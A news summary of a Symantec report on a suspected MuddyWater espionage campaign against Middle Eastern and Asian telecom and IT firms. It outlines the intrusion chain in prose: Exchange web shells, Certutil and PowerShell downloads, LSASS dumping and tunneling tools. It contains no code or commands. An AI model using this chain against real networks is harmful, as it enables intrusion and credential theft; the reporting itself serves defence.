A new espionage hacking effort targeting telecommunication and IT service providers in the Middle East and Asia has been discovered by researchers. The action lasted six months, and there are possible ties to the Iranian-backed actor MERCURY (also known as SeedWorm, MuddyWater, or TEMP.Zagros). Symantec’s Threat Hunter Team gathered evidence and toolkit samples from recent attacks in Israel, Kuwait, Jordan, Saudi Arabia, the United Arab Emirates, Thailand, Pakistan, and Laos.
The attackers appear to be extremely interested in weak Exchange Servers, which they use to deploy web shells. After the first intrusion, they grab account credentials and migrate laterally in the business network. In some situations, they may use their footing to pivot to other related organizations.
Even though the infection vector is unclear, Symantec discovered a case of a ZIP file entitled “Special discount program.zip” that included an installation for remote desktop software. As a result, threat actors may be sending spear-phishing emails to specific individuals.
Developing a Windows service to launch a Windows Script File (WSF) that does network reconnaissance is usually the first evidence of compromise by threat actors. Then, using PowerShell, further WSFs are downloaded, and Certutil is used to download tunneling tools and conduct WMI queries.
A report from Symantec explains, “Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools.”
“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”
The actors employ the eHorus remote access tool after establishing their presence on the target organization, which allows them to accomplish the following:
- Deliver and run a dumping tool for the (suspected) Local Security Authority Subsystem Service (LSASS).
- Deliver (what are thought to be) Ligolo tunneling tools.
- Use Certutil to acquire a URL from (what looks to be) other targeted firms’ Exchange Web Services (EWS).
Symantec logged two IP addresses that coincide with the infrastructure used in previous MuddyWater attacks, notwithstanding the lack of definite attribution. Furthermore, the toolkit bears significant resemblances to cyberattacks identified by Trend Micro researchers in March 2021. However, because many Iranian state-backed actors employ off-the-shelf tools and move infrastructure frequently, no definitive attribution can be made at this time.